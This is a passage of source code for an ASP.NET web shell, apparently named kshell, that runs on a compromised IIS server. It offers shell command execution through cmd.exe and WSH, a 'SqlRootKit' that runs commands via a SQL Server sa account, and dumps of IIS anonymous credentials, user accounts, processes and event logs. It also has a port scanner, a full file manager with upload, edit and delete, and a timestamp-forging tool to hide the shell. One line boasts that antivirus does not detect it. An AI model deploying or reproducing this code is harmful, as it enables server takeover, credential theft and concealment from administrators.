<b>"+ Environment.UserName +"</b><br>" dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + Environment.OSVersion.ToString() + "</b>" dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>" dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "</b><br>" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %> <table width="100%" border="0" align="center"> <tr> <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td> </tr> </table> <hr> <table width="100%" border="0" align="center"> <tr> <td>Currently Dir:</td> <td><font color=red><%=url%></font></td> </tr> <tr> <td width="10%">Operate:</td> <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - <%if session("cutboard")<>"" then%> <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> - <%else%> Paste - <%end if%> <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a> </td> </tr> <tr> <td> Go to: </td> <td> <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>") next %> </td> <td align="Left"> <% response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>") %> </td> </tr> <tr> <td>Tool:</td> <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td> </tr> <tr> <td> </td> <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td> </tr> </table> <hr> <table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr> <tr> <td><% guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("<tr>") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>" response.Write(guru) response.Write("<td><dir></td>") response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>") guru="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>" response.Write(guru) response.Write("</tr>") next %></td> </tr> <tr> <td><% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("<tr>") if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>" response.Write(guru) guru="<td>" & GetSize(xfile.length) & "</td>" response.Write(guru) response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>") guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>" response.Write(guru) response.Write("</tr>") next response.Write("</table>") %></td> </tr> </table> <script language="javascript"> function del() { if(confirm("Are you sure?")){return true;} else{return false;} } function down() { if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;} else{return false;} } </script> <% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %> <div align=center>[ Web Server Information ] <i><a href="javascript:history.back(1);">Back</a></i></div><br> <table width="100%" border="1" align="center"> <tr> <td width="40%">Server IP</td> <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td> </tr> <tr> <td height="73">Machine Name</td> <td><%=Environment.MachineName%></td> </tr> <tr> <td>Network Name</td> <td><%=Environment.UserDomainName.ToString()%></td> </tr> <tr> <td>User Name in this Process</td> <td><%=Environment.UserName%></td> </tr> <tr> <td>OS Version</td> <td><%=Environment.OSVersion.ToString()%></td> </tr> <tr> <td>Started Time</td> <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td> </tr> <tr> <td>System Time</td> <td><%=now%></td> </tr> <tr> <td>IIS Version</td> <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td> </tr> <tr> <td>HTTPS</td> <td><%=request.ServerVariables("HTTPS")%></td> </tr> <tr> <td>PATH_INFO</td> <td><%=request.ServerVariables("PATH_INFO")%></td> </tr> <tr> <td>PATH_TRANSLATED</td> <td><%=request.ServerVariables("PATH_TRANSLATED")%></td> <tr> <td>SERVER_PORT</td> <td><%=request.ServerVariables("SERVER_PORT")%></td> </tr> <tr> <td>SeesionID</td> <td><%=Session.SessionID%></td> </tr> <tr> <td colspan="2"><span class="style3">Client Infomation</span></td> </tr> <tr> <td>Client Proxy</td> <td><%=CP%></td> </tr> <tr> <td>Client IP</td> <td><%=CIP%></td> </tr> <tr> <td>User</td> <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td> </tr> </table> <table align=center> <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %> <tr> <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td> <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td> </tr> </table> <% case "cmd" %> <form runat="server"> <p>[ CMD.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p> Command: <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" /> <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/> <p> <asp:Label ID="result" runat="server" style="style2"/> </p> </form> <% case "cmdw32" %> <form runat="server"> <p>[ ASP.NET W32 Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to run</span>)</p> <% Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>") %> CMD File: <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br> Command: <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/> <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/> </p> </form> <% case "cmdwsh" %> <form runat="server"> <p>[ ASP.NET WSH Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p> Command: <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/> <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/> </p> </form> <% case "pro1" %> <form runat="server"> <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "pro2" %> <form runat="server"> <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center width='80%'> <tr> <td> <% Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>" Dim prostr As String = "" Dim htmlend As String = "</tr></table>" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>" prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>" prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>" prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %> </td> </tr> </table> </form> <% case "user" %> <form runat="server"> <p align=center>[ List User Accounts ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "reg" %> <form runat="server"> <p align=center>[ Registry ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "applog" %> <form runat="server"> <p align=center>[ List Application Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "syslog" %> <form runat="server"> <p align=center>[ List System Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "auser" %> <form runat="server"> <p align=center>[ IIS List Anonymous' User details ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "scan" %> <form runat="server"> <p>[ ASP.NET Port Scanner ] <i><a href="javascript:history.back(1);">Back</a></i></p> <div> C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br /> Start IP : <asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox> --- End Ip : <asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox> <br /> Ports : <asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br /> <br /> <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" /> <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br /> <br /> <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br /> <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px" Width="527px" Visible="False"></asp:ListBox> <hr align=left style="width: 526px" /> <br /> </div> </form> <% case "iisspy" %> <p align=center>[ IIS Spy ] <i><a href="javascript:history.back(1);">Back</a></i></p> <% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %> <p align=center>[ SQL Tool ] <i><a href="javascript:history.back(1);">Back</a></i></p> <% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %> <form runat="server"> <p align=center >[ Registry Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> Key: <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br> Value: <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox> <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="lblresultReg" runat="server" style="color: red"/> </p> </form> <% case "sqlman" %> <form runat="server"> <p>[ MSSQL Query ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>Host: <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p> <p> SQL Name: <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/> SQL Password: <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/> </p> Command: <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br> <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/> <p> <asp:Label ID="lblresultSQL" runat="server" style="style2"/> </p> </form> <% case "sqlrootkit" %> <form runat="server"> <p>[ SqlRootKit.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>Host: <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p> <p> SQL Name: <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/> SQL Password: <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/> </p> Command: <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/> <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/> <p> <asp:Label ID="resultSQL" runat="server" style="style2"/> </p> </form> <% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if end if case "upfile" url=request.QueryString("src") %> <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();"> You will upload file to this directory : <span class="style3"><%=url%></span><br> Please choose file from your computer : <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"> <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a> <% case "new" url=request.QueryString("src") %> <form runat="server"> <%=url%><br> Name: <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/> <br> <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/> <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/> <br> <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom" OnClick="NewFD"/> <input name="Src" type="hidden" value="<%=url%>"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %> <form runat="server"> <table width="100%" border="1" align="center"> <tr> <td width="11%">Path</td> <td width="89%"> <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/> *</td> </tr> <tr> <td>Content</td> <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td> </tr> <tr> <td></td> <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/> </td> </tr> </table> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %> <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();"> <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%> <input type="text" name="name" class="TextBox"> <input type="submit" name="Submit3" value="Submit" class="buttom"> </p> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <script language="javascript"> function checkname() { if(formRn.name.value==""){alert("You shall input filename :(");return false} } </script> <% else if Rename() then response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") else response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") end if end if case "samename" url=request.QueryString("src") %> <form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>"> <p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p> <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom"> <input name="Cancel" type="submit" id="Cancel" value="No" class="buttom"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %> <form runat="server"> <p>[CloneTime for WebAdmin]<i> <a href="javascript:history.back(1);">Back</a></i> </p> <p>A tool that it copy the file or directory's time to another file or directory </p> <p>Rework File or Dir: <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p> <p>Copied File or Dir: <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p> <asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/> </form> <p> <% case "logout" session.Abandon() response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>") end select end if Catch error_x response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message) End Try %> </p> </p> <hr> <script language="javascript"> function closewindow() {self.close();} </script> </body> </html>